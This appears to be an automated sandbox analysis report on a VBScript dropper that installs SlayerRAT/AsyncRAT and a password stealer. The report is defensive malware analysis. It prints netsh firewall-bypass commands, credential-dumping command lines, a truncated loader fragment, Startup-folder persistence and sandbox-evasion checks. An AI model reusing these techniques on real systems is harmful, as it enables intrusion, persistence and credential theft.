Source: servieda.exe.1.dr, SlayerRAT.cs Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: 1.0.Tmp.exe.1d0000.0.unpack, SlayerRAT.cs Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: 1.2.Tmp.exe.1d0000.0.unpack, SlayerRAT.cs Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: d4c6a6df7bab3dad31763de990c4ed82.exe.3.dr, SlayerRAT.cs Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: 3.2.servieda.exe.a0000.0.unpack, SlayerRAT.cs Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: 3.0.servieda.exe.a0000.0.unpack, SlayerRAT.cs Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, SlayerRAT.cs Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: classification engine Classification label: mal100.phis.troj.adwa.spyw.evad.winVBS@22/17@5/5
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Code function: 2_2_0498268E AdjustTokenPrivileges, 2_2_0498268E
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Code function: 2_2_04982657 AdjustTokenPrivileges, 2_2_04982657
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02CC54FA AdjustTokenPrivileges, 13_2_02CC54FA
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02CC54C3 AdjustTokenPrivileges, 13_2_02CC54C3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_0040ED0B FindResourceA,SizeofResource,LoadResource,LockResource, 14_2_0040ED0B
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\codigo[1].txt
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4860:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:956:120:WilError_01
Source: C:\Users\user\AppData\Roaming\servieda.exe Mutant created: \Sessions\1\BaseNamedObjects\d4c6a6df7bab3dad31763de990c4ed82
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\Tmp.exe
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\PaymentNotification.vbs'
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\servieda.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\servieda.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Roaming\servieda.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe System information queried: HandleInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: PaymentNotification.vbs Virustotal: Detection: 12%
Source: PaymentNotification.vbs ReversingLabs: Detection: 17%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\PaymentNotification.vbs'
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Tmp.exe 'C:\Users\user\AppData\Local\Temp\Tmp.exe'
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\pgr.exe 'C:\Users\user\AppData\Local\Temp\pgr.exe'
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process created: C:\Users\user\AppData\Roaming\servieda.exe 'C:\Users\user\AppData\Roaming\servieda.exe'
Source: C:\Users\user\AppData\Roaming\servieda.exe Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Roaming\servieda.exe' 'servieda.exe' ENABLE
Source: C:\Windows\System32\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\pgr.exe' 'pgr.exe' ENABLE
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe'
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process created: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe'
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process created: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe'
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dll
Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, tmpFB21.tmp.exe.2.dr
Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, tmpFB21.tmp.exe.2.dr
Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr
Source: Binary string: mscorrc.pdb source: tmpFB21.tmp.exe, 0000000D.00000002.613320606.00000000058C0000.00000002.00000001.sdmp

Data Obfuscation:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Unpacked PE file: 1.2.Tmp.exe.1d0000.0.unpack
Source: C:\Users\user\AppData\Roaming\servieda.exe Unpacked PE file: 3.2.servieda.exe.a0000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Unpacked PE file: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface:
WScript.Sleep(5000)
Dim shadow,devpoint,members,ramadan
Dim ShaDev
set hfhejotgbhzlzyohafchtul = createobject("wscript.shell")
ShaDev = hfhejotgbhzlzyohafchtul.ExpandEnvironmentStrings("%TEMP%")
Set shadow=CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")
Set members=CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")
shadow.dataType="bin.base64"
members.dataType="bin.base64"
'--------------------------------
shadow.text="..."
.NET source code contains potential unpacker
Source: Tmp.exe.0.dr, SlayerRAT.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: servieda.exe.1.dr, SlayerRAT.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.Tmp.exe.1d0000.0.unpack, SlayerRAT.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.Tmp.exe.1d0000.0.unpack, SlayerRAT.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 79c06ef4ef423d882819c4e66285ec85.exe.2.dr, OK.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.pgr.exe.80000.0.unpack, OK.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.pgr.exe.80000.0.unpack, OK.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: d4c6a6df7bab3dad31763de990c4ed82.exe.3.dr, SlayerRAT.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.2.servieda.exe.a0000.0.unpack, SlayerRAT.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.servieda.exe.a0000.0.unpack, SlayerRAT.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, SlayerRAT.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_00403C3D LoadLibraryA,GetProcAddress,strcpy, 14_2_00403C3D
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Code function: 2_2_00085021 push cs; ret 2_2_00085022
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Code function: 12_2_006E2A66 push 0000003Eh; retn 0000h 12_2_006E2DC0
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Code function: 12_2_006E4122 push eax; ret 12_2_006E412C
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Code function: 12_2_006E2F81 push eax; ret 12_2_006E2F95
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Code function: 12_2_006E7196 push cs; iretd 12_2_006E7202
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_00910712 push eax; ret 13_2_00910726
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_00910712 push eax; ret 13_2_0091074E
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_008EBA9D push eax; ret 13_2_008EBAB1
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_008EBA9D push eax; ret 13_2_008EBAD9
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_0102A16B push cs; retf 13_2_0102A183
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_0102A083 push cs; retf 13_2_0102A09B
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_0102A0F7 push cs; retf 13_2_0102A10F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_00411879 push ecx; ret 14_2_00411889
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_004118A0 push eax; ret 14_2_004118B4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_004118A0 push eax; ret 14_2_004118DC

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe File created: C:\Users\user\AppData\Roaming\servieda.exe
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\Tmp.exe
Source: C:\Users\user\AppData\Local\Temp\pgr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe
Source: C:\Users\user\AppData\Roaming\servieda.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe
Source: C:\Users\user\AppData\Local\Temp\pgr.exe File created: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\pgr.exe
Source: C:\Users\user\AppData\Local\Temp\pgr.exe File created: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe

Boot Survival:

Yara detected AsyncRAT
Source: Yara match File source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.599252774.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tmp87E4.tmp.exe PID: 5036, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe, type: DROPPED
Source: Yara match File source: 12.0.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
Drops PE files to the startup folder
Source: C:\Users\user\AppData\Local\Temp\pgr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe
Source: C:\Users\user\AppData\Roaming\servieda.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\AppData\Local\Temp\pgr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe
Stores files to the Windows start menu directory
Source: C:\Users\user\AppData\Local\Temp\pgr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe
Source: C:\Users\user\AppData\Roaming\servieda.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe

Hooking and other Techniques for Hiding and Protection:

Changes the view of files in windows explorer (hidden files and folders)
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_0040F64B memset,strcpy,memset,strcpy,strcat,strcpy,strcat,GetModuleHandleA,LoadLibraryExA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 14_2_0040F64B
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Sets the process default hard-error mode to SEM_NOOPENFILEERRORBOX (NtSetInformationProcess / SetErrorMode), which suppresses the system dialog that would otherwise appear when a required file cannot be found. Many runtimes and installers set this flag, so it is low-signal on its own; what stands out is that every dropped executable in the chain sets it, including the Startup-folder copy and the netsh.exe instances used for the firewall change. Identical hits are collapsed below with their counts:
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX (3 identical hits)
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process information set: NOOPENFILEERRORBOX (24 identical hits)
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX (43 identical hits)
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX (35 identical hits)
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX (2 identical hits)
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX (2 identical hits)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Process information set: NOOPENFILEERRORBOX (21 identical hits)
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX (41 identical hits)
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX (52 identical hits)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOOPENFILEERRORBOX (5 identical hits)

Malware Analysis System Evasion:

Yara detected AsyncRAT
Source: Yara match File source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.599252774.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tmp87E4.tmp.exe PID: 5036, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe, type: DROPPED
Source: Yara match File source: 12.0.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
Note on reading the dump names: 0000000C.00000000.429733559.00000000006E2000.... is process index 0x0C (12, i.e. tmp87E4.tmp.exe, PID 5036), snapshot 00000000 (taken at process start; 00000002 is taken at process end), a dump id, and the base address of the dumped region (0x6E2000). 12.0.tmp87E4.tmp.exe.6e0000.0.unpack is the PE carved from the same process at the same stage with image base 0x6E0000, so the matches at 0x6E2000 sit inside that image at start and at end of the run, and the dropped file on disk matches as well: the AsyncRAT body is present unpacked from the first instruction, not only after a runtime unpacking stage. The 0x2AF1000 hit at process end is a separate region.
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: tmp87E4.tmp.exe, tmp87E4.tmp.exe.2.dr Binary or memory string: SBIEDLL.DLL
Note: SbieDll.dll is the user-mode DLL Sandboxie injects into every sandboxed process; the usual check is GetModuleHandle("SbieDll.dll") returning non-NULL. The ".2.dr" suffix marks the file as dropped by process index 2.
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\pgr.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Note: the hardware ID in this device-interface path (Ven_NECVMWar, Prod_VMware_SATA_CD00) is VMware's virtual SATA CD-ROM, so the analysis VM is visible to anything that enumerates drives; the same string appears in Tmp.exe's memory in the memory-string hits at the end of this section. Treat the hit as proof that the VMware artifact was reachable, and confirm in the code that the vendor string is actually compared before calling it a deliberate check: plain drive enumeration by a library touches the same path.
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Thread delayed: delay time: 922337203685477
